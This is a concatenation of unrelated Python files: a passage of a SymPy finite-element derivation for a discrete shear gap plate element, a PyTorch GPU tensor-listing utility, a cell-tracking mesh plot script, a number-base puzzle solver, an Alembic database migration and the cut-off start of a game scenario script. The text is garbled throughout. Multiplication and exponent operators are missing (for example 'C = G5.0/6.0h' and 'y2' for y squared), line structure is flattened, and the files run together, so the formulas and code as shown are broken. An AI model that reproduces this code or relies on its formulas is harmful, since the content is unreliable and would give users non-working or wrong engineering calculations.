(kirchhoffShearField_eta.subs(xi,xi3)).subs(eta,eta3) print("eq1 = ",eq1) print("eq2 = ",eq2) print("eq3 = ",eq3) print("eq4 = ",eq4) print("eq5 = ",eq5) print("eq6 = ",eq6) print("eq7 = ",eq7) print("eq8 = ",eq8) print("eq9 = ",eq9) # ----------------------------------------------------------------------------- # Section 5 : Solve equations and recover Ansatz coefficients # ----------------------------------------------------------------------------- UVector = sp.zeros(9,1) #vector of displacements, plate theory rotations still used here UVector[0] = W1 UVector[1] = W2 UVector[2] = W3 UVector[3] = PX1 UVector[4] = PX2 UVector[5] = PX3 UVector[6] = PY1 UVector[7] = PY2 UVector[8] = PY3 results = list(sp.linsolve([eq1,eq2,eq3,eq4,eq5,eq6,eq7,eq8,eq9],[a1,a2,a3,a4,a5,a6,a7,a8,a9])) ansatzCoefficients = results[0] print("\nAnsatz coefficients solved") for i in range(9): print("a",i+1,"=\t",ansatzCoefficients[i]) # ----------------------------------------------------------------------------- # Section 6 : Update previously defined fields with recovered Ansatz coefficients # ----------------------------------------------------------------------------- # updated fields denoted by appended "_u" shearGapField_u = shearGapField.subs([(a1,ansatzCoefficients[0]),(a2,ansatzCoefficients[1]),(a3,ansatzCoefficients[2]),(a4,ansatzCoefficients[3]),(a5,ansatzCoefficients[4]),(a6,ansatzCoefficients[5]),(a7,ansatzCoefficients[6]),(a8,ansatzCoefficients[7]),(a9,ansatzCoefficients[8])]) kirchhoffDispField_u = kirchhoffDispField.subs([(a1,ansatzCoefficients[0]),(a2,ansatzCoefficients[1]),(a3,ansatzCoefficients[2]),(a4,ansatzCoefficients[3]),(a5,ansatzCoefficients[4]),(a6,ansatzCoefficients[5]),(a7,ansatzCoefficients[6]),(a8,ansatzCoefficients[7]),(a9,ansatzCoefficients[8])]) #print("\n kirchhoffDispField_u = ",kirchhoffDispField_u) rmDispField_u = rmDispField.subs([(a1,ansatzCoefficients[0]),(a2,ansatzCoefficients[1]),(a3,ansatzCoefficients[2]),(a4,ansatzCoefficients[3]),(a5,ansatzCoefficients[4]),(a6,ansatzCoefficients[5]),(a7,ansatzCoefficients[6]),(a8,ansatzCoefficients[7]),(a9,ansatzCoefficients[8])]) print("\nrmDispField_u = ",rmDispField_u) moderatorDispField_u = moderatorDispField.subs([(a1,ansatzCoefficients[0]),(a2,ansatzCoefficients[1]),(a3,ansatzCoefficients[2]),(a4,ansatzCoefficients[3]),(a5,ansatzCoefficients[4]),(a6,ansatzCoefficients[5]),(a7,ansatzCoefficients[6]),(a8,ansatzCoefficients[7]),(a9,ansatzCoefficients[8])]) print("\nmoderatorDispField_u = ",moderatorDispField_u) C_u = C.subs([(a1,ansatzCoefficients[0]),(a2,ansatzCoefficients[1]),(a3,ansatzCoefficients[2]),(a4,ansatzCoefficients[3]),(a5,ansatzCoefficients[4]),(a6,ansatzCoefficients[5]),(a7,ansatzCoefficients[6]),(a8,ansatzCoefficients[7]),(a9,ansatzCoefficients[8])]) # ----------------------------------------------------------------------------- # Section 7 : Construct the updated RM (+/-) moderator displacement fields # ----------------------------------------------------------------------------- #Currently the RM disp field is overwritten with a field based on that obtained #form the original DSG formulation. The only difference is instead of representing #the displacement gap it represents the displacement (ie. +W1 to all nodes) #The rotation entries are all multiplied with lengths (a,b,c,d), resulting # in transverse displacement entries. Correct, since we're defining a displacement field rmDispField_w = N1W1 + N2W2 + N3W3 rmDispField_xi = N20.5(a(PX1+PX2) + b(PY1 + PY2)) rmDispField_eta = N30.5(d(PX1+PX3) + c(PY1 + PY3)) #rmDispField_u = rmDispField_w + rmDispField_xi + rmDispField_eta GX_rm = rmDispField_u #The rotation entries in this field are NOT multiplied with lengths (a,b,c,d), resulting #in incorrect rotation entries to the displacement field. In fact, they only become #correct displacement entries in the right angle unit triangle special case (because side lengths are 1.0). #If the side lengths are 1.0 but the triangle is generally skewed, entries will be missing. GX_mod = moderatorDispField_u GX_u = GX_rm + GX_mod GX_u = GX_u.subs([(a1,ansatzCoefficients[0]),(a2,ansatzCoefficients[1]),(a3,ansatzCoefficients[2]),(a4,ansatzCoefficients[3]),(a5,ansatzCoefficients[4]),(a6,ansatzCoefficients[5]),(a7,ansatzCoefficients[6]),(a8,ansatzCoefficients[7]),(a9,ansatzCoefficients[8])]) # rmDispField_u defined above GY_rm = rmDispField_u GY_mod = moderatorDispField_u GY_u = GY_rm - GY_mod GY_u = GY_u.subs([(a1,ansatzCoefficients[0]),(a2,ansatzCoefficients[1]),(a3,ansatzCoefficients[2]),(a4,ansatzCoefficients[3]),(a5,ansatzCoefficients[4]),(a6,ansatzCoefficients[5]),(a7,ansatzCoefficients[6]),(a8,ansatzCoefficients[7]),(a9,ansatzCoefficients[8])]) # ----------------------------------------------------------------------------- # Section 8 : Switch from plate theory rotational DOFs to geometric rotations # ----------------------------------------------------------------------------- ## vector of displacements is updated #UVector = sp.zeros(9,1) #UVector[0] = W1 #UVector[1] = W2 #UVector[2] = W3 #UVector[3] = RX1 #UVector[4] = RX2 #UVector[5] = RX3 #UVector[6] = RY1 #UVector[7] = RY2 #UVector[8] = RY3 #print("Vector of displacements (rotations are per FEM):\n",UVector) # ## Sub in Kratos rotations #GX_u = GX_u.subs([(PY1,-RX1),(PY2,-RX2),(PY3,-RX3),(PX1,RY1),(PX2,RY2),(PX3,RY3)]) #GY_u = GY_u.subs([(PY1,-RX1),(PY2,-RX2),(PY3,-RX3),(PX1,RY1),(PX2,RY2),(PX3,RY3)]) # Jacobian entries dxi_dx = c/detJ deta_dx = -b/detJ dxi_dy = -d/detJ deta_dy = a/detJ # ----------------------------------------------------------------------------- # Section 9 : Cartesian transformation # ----------------------------------------------------------------------------- # Big Cartesian transformation - I think this is incorrect #rmShearField_xi_u = sp.diff(GX_u,xi)dxi_dx + sp.diff(GX_u,eta)deta_dx + sp.diff(GY_u,xi)dxi_dx + sp.diff(GY_u,eta)deta_dx #rmShearField_eta_u = sp.diff(GY_u,xi)dxi_dy + sp.diff(GY_u,eta)deta_dy + sp.diff(GX_u,xi)dxi_dy + sp.diff(GX_u,eta)deta_dy # Cartesian transformation used in Original DSG derivation #rmShearField_xi_u = sp.diff(GX_u,xi)c/detJ + sp.diff(GY_u,eta)-b/detJ #rmShearField_eta_u = sp.diff(GY_u,eta)a/detJ + sp.diff(GX_u,xi)-d/detJ # Parametric only differentiation rmShearField_xi_u = sp.diff(GX_u,xi) rmShearField_eta_u = sp.diff(GY_u,eta) print("\ parametric only rmShearField_xi_u = ",rmShearField_xi_u) print("\ parametric only rmShearField_eta_u = ",rmShearField_eta_u) # ----------------------------------------------------------------------------- # Section 10 : Print out results # ----------------------------------------------------------------------------- print("\n\n\nSymbolic B Matrix ( transformed to cartesian ) (1/detJ taken out) = ") # Assemble B Matrix ------------------------------------------ B = sp.zeros(2,9) for col in range(9): B[0,col] = sp.diff(rmShearField_xi_u,UVector[col]) B[1,col] = sp.diff(rmShearField_eta_u,UVector[col]) sp.pprint(sp.simplify(B),wrap_line=False) # ----------------------------------------------------------------------------- # Section 11 : Solve example problem # ----------------------------------------------------------------------------- disps = sp.zeros(9,1) disps[0] = 0.5 # disps[1] = 1.0 # disps[2] = 0.5 # disps[3] = 1.0 # disps[4] = -2.0 #solved for disps[5] = 1.5 disps[6] = 1.0 # disps[7] = 1.5 #solved for disps[8] = -1.0 #solved for C = sp.zeros(2,2) E = 1000 G = E/2.0 #poisson = 0.0 h = 0.05 C[0,0] = 1 C[1,1] = 1 C = G5.0/6.0h K = B.T C * B K1 = sp.integrate(K,(eta,0.0,1.0-xi)) Kint = sp.integrate(K1,(xi,0.0,1.0)) print("\n\nCartesian stiffness matrix integrated symbolically:") sp.pprint(sp.N(Kint,3),wrap_line=False) #setup reduced system and get rid of prescribed displacements redK = sp.zeros(3,3) redF = sp.zeros(3,1) displacedDOFs = [1,2,3,4,6,7] #dof number, not index freeDOFs = [5,8,9] #dof number, not index for DOFrowcheck in range(len(freeDOFs)): tempF = 0.0 row = freeDOFs[DOFrowcheck] - 1 for DOFcolcheck in range(len(displacedDOFs)): col = displacedDOFs[DOFcolcheck] - 1 tempF += Kint[row,col] * disps[col] redF[DOFrowcheck] = 0.0 - tempF for row in range(len(freeDOFs)): for col in range(len(freeDOFs)): redK[row,col] = Kint[freeDOFs[row]-1,freeDOFs[col]-1] solvedDisps = (redK*-1)redF print("\nSolved displacements:") sp.pprint(solvedDisps) BletzyResults = sp.zeros(3,1) BletzyResults[0] = -2.0 BletzyResults[1] = 1.5 BletzyResults[2] = -1.0 print("\nBletzinger's displacements:") sp.pprint(BletzyResults) print("\n\n\n=====================================================================\n") print("\tNOW RE-RUNNING PROBLEM INCLUDING BENDING FORMULATION") print("\n=====================================================================\n") #Bletzinger maple worksheet DOF order maintained here B_bend_and_shear = sp.zeros(5,9) a = xi2 - xi1 b = eta2 - eta1 c = eta3 - eta1 d = xi3 - xi1 #Add in bending B matrix from DSG, re-arranged for maple DOF ordering #phix's B_bend_and_shear[0,3] = b-c B_bend_and_shear[1,3] = 0.0 B_bend_and_shear[2,3] = d-a B_bend_and_shear[0,4] = c B_bend_and_shear[1,4] = 0.0 B_bend_and_shear[2,4] = -d B_bend_and_shear[0,5] = -b B_bend_and_shear[1,5] = 0.0 B_bend_and_shear[2,5] = a #phiy's B_bend_and_shear[0,6] = 0.0 B_bend_and_shear[1,6] = d-a B_bend_and_shear[2,6] = b-c B_bend_and_shear[0,7] = 0.0 B_bend_and_shear[1,7] = -d B_bend_and_shear[2,7] = c B_bend_and_shear[0,8] = 0.0 B_bend_and_shear[1,8] = a B_bend_and_shear[2,8] = -b area = 1.01.0/2.0 B_bend_and_shear /= (2.0area) #divide bending part of Bmat by detJ #Copy in shear B matrix, already calculated above, no scaling needed for row in range(2): for col in range(9): B_bend_and_shear[3+row,col] = B[row,col] # Setup combined material matrix C_bend_and_shear = sp.zeros(5,5) C_bend_and_shear[0,0] = 1.0 C_bend_and_shear[1,1] = 1.0 C_bend_and_shear[0,1] = 0.0 C_bend_and_shear[1,0] = 0.0 C_bend_and_shear[2,2] = (1.0-0.0)/2.0 C_bend_and_shear = (Eh*3/(12)) for row in range(2): for col in range(2): C_bend_and_shear[3+row,3+col] = C[row,col] #Calc combined K K_temp3 = B_bend_and_shear.T C_bend_and_shear * B_bend_and_shear Ktemp1 = sp.integrate(K_temp3,(eta,0.0,1.0-xi)) K_bend_and_shear = sp.integrate(Ktemp1,(xi,0.0,1.0)) print("\n\nCombined stiffness matrix :") sp.pprint(sp.N(K_bend_and_shear,3),wrap_line=False) #setup reduced system and get rid of prescribed displacements for DOFrowcheck in range(len(freeDOFs)): tempF = 0.0 row = freeDOFs[DOFrowcheck] - 1 for DOFcolcheck in range(len(displacedDOFs)): col = displacedDOFs[DOFcolcheck] - 1 tempF += K_bend_and_shear[row,col] * disps[col] redF[DOFrowcheck] = 0.0 - tempF for row in range(len(freeDOFs)): for col in range(len(freeDOFs)): redK[row,col] = K_bend_and_shear[freeDOFs[row]-1,freeDOFs[col]-1] solvedDisps = (redK*-1)redF print("\nSolved displacements:") sp.pprint(solvedDisps) # ----------------------------------------------------------------------------- # Section 12 : Plot results # ----------------------------------------------------------------------------- print('\n\n\n\ntotal displacement vector = ') for i in range(9): print(disps[i]) shearGapField_u = shearGapField_u.subs([(W1,disps[0]),(W2,disps[1]),(W3,disps[2]),(PX1,disps[3]),(PX2,disps[4]),(PX3,disps[5]),(PY1,disps[6]),(PY2,disps[7]),(PY3,disps[8])]) print('\n\nshearGapField_u = ',shearGapField_u) kirchhoffDispField_u = kirchhoffDispField_u.subs([(W1,disps[0]),(W2,disps[1]),(W3,disps[2]),(PX1,disps[3]),(PX2,disps[4]),(PX3,disps[5]),(PY1,disps[6]),(PY2,disps[7]),(PY3,disps[8])]) print('\n\nkirchhoffDispField_u = ',kirchhoffDispField_u) rmDispField_u = rmDispField_u.subs([(W1,disps[0]),(W2,disps[1]),(W3,disps[2]),(PX1,disps[3]),(PX2,disps[4]),(PX3,disps[5]),(PY1,disps[6]),(PY2,disps[7]),(PY3,disps[8])]) print('\n\nrmDispField_u = ',rmDispField_u) moderatorDispField_u=moderatorDispField_u.subs([(W1,disps[0]),(W2,disps[1]),(W3,disps[2]),(PX1,disps[3]),(PX2,disps[4]),(PX3,disps[5]),(PY1,disps[6]),(PY2,disps[7]),(PY3,disps[8])]) print('\n\nmoderatorDispField_u = ',moderatorDispField_u) rmShearField_xi_u = rmShearField_xi_u.subs([(W1,disps[0]),(W2,disps[1]),(W3,disps[2]),(PX1,disps[3]),(PX2,disps[4]),(PX3,disps[5]),(PY1,disps[6]),(PY2,disps[7]),(PY3,disps[8])]) print('\n\nrmShearField_xi_u = ',rmShearField_xi_u) kirchhoffShearField_xi_u = kirchhoffShearField_xi.subs([(a1,ansatzCoefficients[0]),(a2,ansatzCoefficients[1]),(a3,ansatzCoefficients[2]),(a4,ansatzCoefficients[3]),(a5,ansatzCoefficients[4]),(a6,ansatzCoefficients[5]),(a7,ansatzCoefficients[6]),(a8,ansatzCoefficients[7]),(a9,ansatzCoefficients[8])]) kirchhoffShearField_xi_u = kirchhoffShearField_xi_u.subs([(W1,disps[0]),(W2,disps[1]),(W3,disps[2]),(PX1,disps[3]),(PX2,disps[4]),(PX3,disps[5]),(PY1,disps[6]),(PY2,disps[7]),(PY3,disps[8])]) print('\n\nkirchhoffShearField_xi_u = ',kirchhoffShearField_xi_u) kirchhoffShearField_eta_u = kirchhoffShearField_eta.subs([(a1,ansatzCoefficients[0]),(a2,ansatzCoefficients[1]),(a3,ansatzCoefficients[2]),(a4,ansatzCoefficients[3]),(a5,ansatzCoefficients[4]),(a6,ansatzCoefficients[5]),(a7,ansatzCoefficients[6]),(a8,ansatzCoefficients[7]),(a9,ansatzCoefficients[8])]) kirchhoffShearField_eta_u = kirchhoffShearField_eta_u.subs([(W1,disps[0]),(W2,disps[1]),(W3,disps[2]),(PX1,disps[3]),(PX2,disps[4]),(PX3,disps[5]),(PY1,disps[6]),(PY2,disps[7]),(PY3,disps[8])]) print('\n\nkirchhoffShearField_eta_u = ',kirchhoffShearField_eta_u) divisions = 25 u = np.linspace(0, 1, divisions) v = np.linspace(1, 0, divisions) x_mesh = np.outer(np.ones_like(u), v) y_mesh = np.outer(v, u) divisions = 25 u = np.linspace(0, 1, divisions) v = np.linspace(1, 0, divisions) x = np.outer(np.ones_like(u), v) y = np.outer(v, u) #cm.coolwarm fig = plt.figure(1) # shearGapField_u z = 1.0y2 - 0.5yx - 1.0y + 1.5x2 - 1.0x + 0.5 ax = fig.gca(projection='3d') ax.plot_wireframe(x_mesh,y_mesh,0.0) surf = ax.plot_surface(x, y, z, rstride=1, cstride=1, cmap=cm.jet, linewidth=0, antialiased=True) #ax.set_zlabel('shearGapField_u',fontsize=myfontsize) ax.zaxis.set_major_locator(LinearLocator(10)) ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f')) ax.set_zticks([0, 0.25, 0.5, 0.75, 1]) plt.xlabel('xi') plt.ylabel('eta') ax.set_zlim(0, 1) surf.set_clim(vmin=0, vmax=1) fig.colorbar(surf, shrink=0.75, aspect=20) plt.title('Displacement gap field') plt.savefig('displacement_gap_field.pdf',bbox_inches="tight") ax.elev = 89 ax.azim = -90 ax.w_zaxis.line.set_lw(0.) ax.set_zticks([]) plt.savefig('displacement_gap_field_90.pdf',bbox_inches="tight") fig = plt.figure(2) # kirchhoffDispField_u z = -1.0y2 + 0.5yx + 1.0y - 1.5x2 + 1.0x - 0.5 ax = fig.gca(projection='3d') ax.plot_wireframe(x_mesh,y_mesh,0.0) surf = ax.plot_surface(x, y, z, rstride=1, cstride=1, cmap=cm.jet, linewidth=0, antialiased=True) #ax.set_zlim(-1.01, 1.01) ax.zaxis.set_major_locator(LinearLocator(10)) ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f')) ax.set_zticks([-1, -0.75, -0.5, -0.25, 0]) plt.xlabel('xi') plt.ylabel('eta') ax.set_zlim(-1, 0) surf.set_clim(vmin=-1, vmax=0) fig.colorbar(surf, shrink=0.75, aspect=20) plt.title('KT displacement field') plt.savefig('kt_displacement_field.pdf',bbox_inches="tight") ax.elev = 89 ax.azim = -90 ax.w_zaxis.line.set_lw(0.) ax.set_zticks([]) plt.savefig('kt_displacement_field_90.pdf',bbox_inches="tight") fig = plt.figure(3) # rmDispField_u z = 0.0 ax = fig.gca(projection='3d') ax.plot_wireframe(x_mesh,y_mesh,0.0) surf = ax.plot_surface(x, y, z, rstride=1, cstride=1, cmap=cm.jet, linewidth=0, antialiased=True) #ax.set_zlim(-1.01, 1.01) ax.zaxis.set_major_locator(LinearLocator(10)) ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f')) ax.set_zticks([-1, 0, 1]) plt.xlabel('xi') plt.ylabel('eta') ax.set_zlim(-1, 1) surf.set_clim(vmin=-1, vmax=1) fig.colorbar(surf, shrink=0.75, aspect=20) plt.title('RM shear-displacement field') plt.savefig('rm_shear_disp_field.pdf',bbox_inches="tight") #ax.elev = 89 #ax.azim = -90 #ax.w_zaxis.line.set_lw(0.) #ax.set_zticks([]) #plt.savefig('rm_shear_disp_field_90.pdf',bbox_inches="tight") fig = plt.figure(4) # addition of fields z = 1.0y2 - 0.5yx - 1.0y + 1.5x2 - 1.0x + 0.5 ax = fig.gca(projection='3d') ax.plot_wireframe(x_mesh,y_mesh,0.0) surf1 = ax.plot_surface(x, y, z, rstride=1, cstride=1, cmap=cm.jet, linewidth=0, antialiased=True) z = -1.0y2 + 0.5yx + 1.0y - 1.5x2 + 1.0x - 0.5 ax = fig.gca(projection='3d') surf2 = ax.plot_surface(x, y, z, rstride=1, cstride=1, cmap=cm.jet, linewidth=0, antialiased=True) z = 0.0 ax = fig.gca(projection='3d') surf3 = ax.plot_surface(x, y, z, rstride=1, cstride=1, cmap=cm.jet, linewidth=0, antialiased=True) ax.zaxis.set_major_locator(LinearLocator(10)) ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f')) ax.set_zticks([-1, -0.5, 0, 0.5, 1]) plt.xlabel('xi') plt.ylabel('eta') ax.set_zlim(-1, 1) #fig.colorbar(surf1, shrink=1, aspect=10) surf1.set_clim(vmin=-1, vmax=1) surf2.set_clim(vmin=-1, vmax=1) surf3.set_clim(vmin=-1, vmax=1) fig.colorbar(surf, shrink=0.75, aspect=20) plt.title('Displacement gap + KT = RM shear-displacement') plt.savefig('sum.pdf',bbox_inches="tight") #ax.elev = 89 #ax.azim = -90 #ax.w_zaxis.line.set_lw(0.) #ax.set_zticks([]) #plt.savefig('sum_90.pdf',bbox_inches="tight") fig = plt.figure(5) # kirchhoffShearField_xi_u z = 0.5y - 3.0x + 1.0 ax = fig.gca(projection='3d') ax.plot_wireframe(x_mesh,y_mesh,0.0) surf = ax.plot_surface(x, y, z, rstride=1, cstride=1, cmap=cm.jet, linewidth=0, antialiased=True) #ax.set_zlim(-1.01, 1.01) ax.zaxis.set_major_locator(LinearLocator(10)) ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f')) ax.set_zticks([-2, -1.5, -1, -0.5, 0, 0.5, 1 ,1.5]) plt.xlabel('xi') plt.ylabel('eta') ax.set_zlim(-2, 1.5) surf.set_clim(vmin=-2, vmax=1.5) fig.colorbar(surf, shrink=0.75, aspect=20) ax.set_zlim(-2, 1.5) surf.set_clim(vmin=-2, vmax=1.5) plt.title('Rotation xi field') plt.savefig('rotation_xi.pdf',bbox_inches="tight") ax.elev = 89 ax.azim = -90 ax.w_zaxis.line.set_lw(0.) ax.set_zticks([]) plt.savefig('rotation_xi_90.pdf',bbox_inches="tight") fig = plt.figure(6) # kirchhoffShearField_eta_u z = -2.0y + 0.5x + 1.0 ax = fig.gca(projection='3d') ax.plot_wireframe(x_mesh,y_mesh,0.0) surf = ax.plot_surface(x, y, z, rstride=1, cstride=1, cmap=cm.jet, linewidth=0, antialiased=True) #ax.set_zlim(-1.01, 1.01) ax.zaxis.set_major_locator(LinearLocator(10)) ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f')) ax.set_zlim(-1, 1.5) surf.set_clim(vmin=-1, vmax=1.5) fig.colorbar(surf, shrink=0.75, aspect=20) ax.set_zticks([-1, -0.5, 0, 0.5, 1 ,1.5]) plt.xlabel('xi') plt.ylabel('eta') ax.set_zlim(-1, 1.5) surf.set_clim(vmin=-1, vmax=1.5) plt.title('Rotation eta field') plt.savefig('rotation_eta.pdf',bbox_inches="tight") ax.elev = 89 ax.azim = -90 ax.w_zaxis.line.set_lw(0.) ax.set_zticks([]) plt.savefig('rotation_eta_90.pdf',bbox_inches="tight") plt.show()
# -- coding: utf-8 -- """ Created on Tue Oct 27 05:55:29 2020 @author: cupertino_user """ import torch import gc #del variables #gc.collect() #torch.cuda.memory_summary(device="cuda:1", abbreviated=False) def pretty_size(size): """Pretty prints a torch.Size object""" assert(isinstance(size, torch.Size)) return " × ".join(map(str, size)) def dump_tensors(gpu_only=True): """Prints a list of the Tensors being tracked by the garbage collector.""" total_size = 0 for obj in gc.get_objects(): try: if torch.is_tensor(obj): if not gpu_only or obj.is_cuda: print("%s:%s%s %s" % (type(obj).__name__, " GPU" if obj.is_cuda else "", " pinned" if obj.is_pinned else "", pretty_size(obj.size()))) total_size += obj.numel() elif hasattr(obj, "data") and torch.is_tensor(obj.data): if not gpu_only or obj.is_cuda: print("%s → %s:%s%s%s%s %s" % (type(obj).__name__, type(obj.data).__name__, " GPU" if obj.is_cuda else "", " pinned" if obj.data.is_pinned else "", " grad" if obj.requires_grad else "", " volatile" if obj.volatile else "", pretty_size(obj.data.size()))) total_size += obj.data.numel() except Exception as e: pass print("Total size:", total_size) torch.cuda.empty_cache() gc.collect() dump_tensors(True)
# Copyright 2016 Jochen Kursawe. See the LICENSE file at the top-level directory # of this distribution and at https://github.com/kursawe/MCSTracker/blob/master/LICENSE. import tracking import networkx as nx import matplotlib as mpl import matplotlib.pyplot as plt from os import path from os.path import dirname import sys import copy def make_initial_mapping_plot(): # print 'I am printing' # mesh_sequence = mesh.read_sequence_from_data(path.join(dirname(__file__),'..','..','..', # 'test','test_on_data', # 'data','first_few_frames')) # # first_mesh = mesh_sequence[0] # # second_mesh = mesh_sequence[1] sys.setrecursionlimit(40000) first_mesh = mesh.creation.generate_random_tesselation(9,9) second_mesh = copy.deepcopy(first_mesh) first_mesh.assign_frame_ids_in_order() second_mesh.assign_frame_ids_randomly() first_mesh.save(path.join(dirname(__file__),'first_mesh.mesh')) second_mesh.save(path.join(dirname(__file__),'second_mesh.mesh')) subgraph_finder = tracking.LocalisedSubgraphFinder(first_mesh, second_mesh) initial_tracking_state = subgraph_finder.create_starting_tracking_state() cell_id_in_first_mesh = initial_tracking_state.id_map.keys()[0] cell_id_in_second_mesh = initial_tracking_state.id_map.values()[0] neighbours_in_first_mesh = nx.single_source_shortest_path_length(subgraph_finder.network_one, cell_id_in_first_mesh, cutoff=2 ).keys() neighbours_in_second_mesh = nx.single_source_shortest_path_length(subgraph_finder.network_two, cell_id_in_second_mesh, cutoff=2 ).keys() first_mesh_polygon_list = [] for element in first_mesh.elements: this_polygon = mpl.patches.Polygon([node.position for node in element.nodes], fill = True) if element.id_in_frame in neighbours_in_first_mesh: this_polygon.set_facecolor('lightgrey') if element.id_in_frame == cell_id_in_first_mesh: this_polygon.set_facecolor('blue') else: this_polygon.set_facecolor([1.0, 1.0, 1.0]) first_mesh_polygon_list.append(this_polygon) first_mesh_polygon_collection = mpl.collections.PatchCollection(first_mesh_polygon_list, match_original = True) first_mesh_figure = plt.figure() first_mesh_figure.gca().add_collection(first_mesh_polygon_collection) first_mesh_figure.gca().set_aspect('equal') first_mesh_figure.gca().autoscale_view() plt.axis('off') first_mesh_figure.savefig('first_mesh.pdf', bbox_inches = 'tight') plt.close(first_mesh_figure) second_mesh_polygon_list = [] for element in second_mesh.elements: this_polygon = mpl.patches.Polygon([node.position for node in element.nodes], fill = True) if element.id_in_frame in neighbours_in_second_mesh: this_polygon.set_facecolor('lightgrey') if element.id_in_frame == cell_id_in_second_mesh: this_polygon.set_facecolor('blue') else: this_polygon.set_facecolor([1.0, 1.0, 1.0]) second_mesh_polygon_list.append(this_polygon) second_mesh_polygon_collection = mpl.collections.PatchCollection(second_mesh_polygon_list, match_original = True) second_mesh_figure = plt.figure() second_mesh_figure.gca().add_collection(second_mesh_polygon_collection) second_mesh_figure.gca().set_aspect('equal') second_mesh_figure.gca().autoscale_view() plt.axis('off') second_mesh_figure.savefig('second_mesh.pdf', bbox_inches = 'tight') plt.close(second_mesh_figure) if __name__=="__main__": print 'I am printing, too' make_initial_mapping_plot()
import sys import platform # https://stackoverflow.com/a/22820100 def is_windows(): return any(platform.win32_ver())

import os import itertools class NumberBase: base_digits = '0123456789abcdefghijklmnopqrstuvwxyz' @staticmethod def get_minimum_non_repeating_number(base): min_number_digits = ['1', '0'] + [NumberBase.base_digits[x] for x in range(2, base)] min_number = int(''.join(min_number_digits), base) return min_number @staticmethod def get_maximum_non_repeating_number(base): max_number_digits = [NumberBase.base_digits[x] for x in range(base - 1, -1, -1)] max_number = int(''.join(max_number_digits), base) return max_number def main(): os.chdir(os.path.dirname(__file__)) input_file = open('submitInput.txt', 'r') input_file.readline() output_file = open('submitOutput.txt', 'w') for index, line in enumerate(input_file): base = len(line.rstrip()) min_number = NumberBase.get_minimum_non_repeating_number(base) max_number = NumberBase.get_maximum_non_repeating_number(base) output_file.write('Case #{}: {}\n'.format( index + 1, max_number - min_number )) input_file.close() output_file.close() if __name__ == '__main__': main()

"""empty message Revision ID: 76d81c37d676 Revises: 21d138d4483a Create Date: 2021-09-20 19:51:31.102664 """ from alembic import op import sqlalchemy as sa from sqlalchemy.dialects import mysql # revision identifiers, used by Alembic. revision = '76d81c37d676' down_revision = '21d138d4483a' branch_labels = None depends_on = None def upgrade(): # ### commands auto generated by Alembic - please adjust! ### op.add_column('trading', sa.Column('Bid outcome', sa.Float(), nullable=True)) op.drop_index('Date, time', table_name='trading') op.drop_column('trading', 'Bid outcome Volume') # ### end Alembic commands ### def downgrade(): # ### commands auto generated by Alembic - please adjust! ### op.add_column('trading', sa.Column('Bid outcome Volume', mysql.FLOAT(), nullable=True)) op.create_index('Date, time', 'trading', ['Date, time'], unique=False) op.drop_column('trading', 'Bid outcome') # ### end Alembic commands ###

from ED6ScenarioHelper import * def main(): # 卢安 CreateScenaFile( FileName = 'T2104 ._SN', MapName = 'Ruan', Location = 'T2104.x', MapIndex = 1, MapDefaultBGM = "ed60010", Flags = 0, EntryFunctionIndex = 0xFFFF, Reserved = 0, IncludedScenario = [ '', '', '', '', '', '', '', '' ], ) BuildStringList( '@FileName', # 8 '戴尔蒙市长', # 9 '尤莉亚中尉', # 10 '亲卫队', # 11 '亲卫队', # 12 '亲卫队', # 13 '亲卫队', # 14 ' ', # 15 ) DeclEntryPoint( Unknown_00 = 0, Unknown_04 = 0, Unknown_08 = 6000, Unknown_0C = 4, Unknown_0E = 0, Unknown_10 = 0, Unknown_14 = 9500, Unknown_18 = -10000, Unknown_1C = 0, Unknown_20 = 0, Unknown_24 = 0, Unknown_28 = 2800, Unknown_2C = 262, Unknown_30 = 45, Unknown_32 = 0, Unknown_34 = 360, Unknown_36 = 0, Unknown_38 = 0, Unknown_3A = 0, InitScenaIndex = 0, InitFunctionIndex = 0, EntryScenaIndex = 0, EntryFunctionIndex = 1, ) AddCharChip( 'ED6_DT07/CH02410 ._CH', # 00 'ED6_DT07/CH02090 ._CH', # 01 'ED6_DT07/CH01320 ._CH', # 02 'ED6_DT07/CH00005 ._CH', # 03 'ED6_DT07/CH00015 ._CH', # 04 'ED6_DT07/CH00045 ._CH', # 05 ) AddCharChipPat( 'ED6_DT07/CH02410P._CP', # 00 'ED6_DT07/CH02090P._CP', # 01 'ED6_DT07/CH01320P._CP', # 02 'ED6_DT07/CH00005P._CP', # 03 'ED6_DT07/CH00015P._CP', # 04 'ED6_DT07/CH00045P._CP', # 05 ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 0, Unknown2 = 0, Unknown3 = 0, ChipIndex = 0x0, NpcIndex = 0x181, InitFunctionIndex = -1, InitScenaIndex = -1, TalkFunctionIndex = -1, TalkScenaIndex = -1, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 0, Unknown2 = 0, Unknown3 = 1, ChipIndex = 0x1, NpcIndex = 0x181, InitFunctionIndex = -1, InitScenaIndex = -1, TalkFunctionIndex = -1, TalkScenaIndex = -1, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 0, Unknown2 = 0, Unknown3 = 2, ChipIndex = 0x2, NpcIndex = 0x181, InitFunctionIndex = -1, InitScenaIndex = -1, TalkFunctionIndex = -1, TalkScenaIndex = -1, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 0, Unknown2 = 0, Unknown3 = 2, ChipIndex = 0x2, NpcIndex = 0x181, InitFunctionIndex = -1, InitScenaIndex = -1, TalkFunctionIndex = -1, TalkScenaIndex = -1, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 0, Unknown2 = 0, Unknown3 = 2, ChipIndex = 0x2, NpcIndex = 0x181, InitFunctionIndex = -1, InitScenaIndex = -1, TalkFunctionIndex = -1, TalkScenaIndex = -1, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 0, Unknown2 = 0, Unknown3 = 2, ChipIndex = 0x2, NpcIndex = 0x181, InitFunctionIndex = -1, InitScenaIndex = -1, TalkFunctionIndex = -1, TalkScenaIndex = -1, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 0, Unknown2 = 0, Unknown3 = 0, ChipIndex = 0x0, NpcIndex = 0x180, InitFunctionIndex = -1, InitScenaIndex = -1, TalkFunctionIndex = -1, TalkScenaIndex = -1, ) ScpFunction( 